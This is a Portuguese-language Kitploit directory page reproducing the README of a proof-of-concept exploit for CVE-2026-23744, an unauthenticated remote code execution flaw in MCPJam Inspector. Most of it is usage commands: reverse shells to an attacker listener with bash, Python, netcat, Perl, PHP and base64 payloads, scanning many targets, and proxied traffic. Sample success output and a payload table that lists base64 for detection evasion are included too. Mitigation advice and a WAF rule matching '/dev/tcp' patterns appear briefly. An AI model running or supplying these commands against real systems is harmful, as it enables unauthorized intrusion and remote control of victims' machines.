Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23744-MCPJam-Exploit — Uma prova de conceito de exploit para a vulnerabilidade CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE). Esta ferramenta demonstra a falha de segurança nas versões <=1.4.2 e ajuda pesquisadores de segurança a verificar correções. Apenas para testes autorizados e fins educacionais. Inclui múltiplas opções de payload, execução de comandos e gerenciamento de sessão. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

CVE-2026-23744-MCPJam-Exploit

Ver Repositório
71há 1 mêsAinda não revisado

Uma prova de conceito de exploit para a vulnerabilidade CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE). Esta ferramenta demonstra a falha de segurança nas versões <=1.4.2 e ajuda pesquisadores de segurança a verificar correções. Apenas para testes autorizados e fins educacionais. Inclui múltiplas opções de payload, execução de comandos e gerenciamento de sessão.

Compartilhar

CVE-2026-23744 Exploração RCE do MCPJam Inspector

Security Research Python 3.7+ Version Author


⚠️ AVISO

Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O uso não autorizado é ilegal. Os usuários assumem toda a responsabilidade por suas ações.


📋 Visão Geral

Este repositório contém uma prova de conceito de exploração para CVE-2026-23744, uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada encontrada no MCPJam Inspector versões <=1.4.2. A vulnerabilidade possui uma pontuação CVSS crítica de 9,8, indicando um risco severo com vetor de ataque de rede.


📸 Capturas de Tela

ex

🚀 Recursos

A ferramenta de exploração oferece um conjunto abrangente de recursos projetados para testes de segurança eficazes:

  • Suporte a Múltiplos Payloads: Inclui payloads Bash, Python, Netcat, Perl, PHP e Base64.
  • Execução de Comandos: Execute comandos no sistema alvo com captura de saída.
  • Varredura de Alvos: Varra múltiplos alvos com limitação de taxa configurável.
  • Gerenciamento de Sessões: Gerenciamento persistente de sessões para testes contínuos.
  • Suporte a Proxy: Integre com proxies para tráfego anônimo ou roteado.
  • Identificação de Alvo: Identifique características do sistema alvo.
  • Configuração Automática de Listener: Configure automaticamente listeners para shells reversos.

📦 Instalação

Para configurar a ferramenta de exploração, siga estas etapas:

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. Instale as dependências:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 Exemplos de Uso

Exploração Básica

Para iniciar uma exploração básica, primeiro configure um listener e depois execute o script de exploração:

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

Execução de Comandos

Execute comandos individuais ou comandos de um arquivo:

root@kitploit:~
# Execute single command
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# Execute commands from file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

Diferentes Payloads

Utilize vários tipos de payload para diferentes cenários:

root@kitploit:~
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Base64 encoded payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

Varredura de Alvos

Varra múltiplos alvos em busca de vulnerabilidades:

root@kitploit:~
# Create targets file
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# Scan for vulnerable targets
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

Opções Avançadas

Explore funcionalidades avançadas como identificação, uso de proxy, modo detalhado e configuração automática de listener:

root@kitploit:~
# With fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# With proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# Verbose mode
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# Auto-listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 Tipos de Payload


📊 Exemplo de Saída

root@kitploit:~
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444

🛡️ Mitigação

Ações Imediatas

Para se proteger contra o CVE-2026-23744, é crucial tomar as seguintes ações imediatas:

  • Atualize o MCPJam Inspector para a versão >1.4.2.
  • Isolar sistemas vulneráveis da rede.
  • Monitore solicitações POST suspeitas para /api/mcp/connect.
  • Implemente regras de Firewall de Aplicação Web (WAF) para bloquear padrões maliciosos.

Exemplo de Regra WAF

Exemplo de regra Nginx WAF para bloquear padrões maliciosos comuns:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ Perguntas Frequentes

P: É legal usar isso?

R: Esta ferramenta só é legal para usar em sistemas que você possui ou para os quais tem permissão explícita por escrito para testar.

P: Quais sistemas são vulneráveis?

R: As versões do MCPJam Inspector <=1.4.2 são vulneráveis.

P: Como posso proteger meus sistemas?

R: Atualize para a versão >1.4.2 do MCPJam Inspector imediatamente.


📚 Referências

  • CVE-2026-23744 MITRE

👤 Autor

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 Registro de Alterações

Versão 2.0 (14 de julho de 2026)

  • ✅ Corrigida confiabilidade da verificação do listener
  • ✅ Implementado modo de execução de comandos
  • ✅ Adicionada identificação de alvo
  • ✅ Gerenciamento de sessão aprimorado
  • ✅ Adicionados fallbacks de payload

Versão 1.0 (10 de julho de 2026)

  • ✅ Lançamento inicial

⚠️ Aviso Final

O uso não autorizado desta ferramenta é ilegal e pode resultar em consequências graves, incluindo:

  • Processo criminal
  • Ações civis
  • Registro criminal permanente
  • Sanções profissionais

Feito com ❤️ por Sudeepa Wanigarathna

Baixar ferramenta
AtributoDetalhes
CVE IDCVE-2026-23744
VulnerabilidadeExecução Remota de Código Não Autenticada
Versões Afetadas<=1.4.2
Pontuação CVSS9.8 (Crítico)
Vetor de AtaqueRede
TipoComandoMelhor Para
bashShell reverso BashMaioria dos sistemas Linux
pythonShell reverso Python3Sistemas com Python instalado
ncShell reverso NetcatSistemas com netcat
perlShell reverso PerlSistemas com Perl instalado
phpShell reverso PHPSistemas com PHP instalado
base64Codificado em Base64Evasão de detecção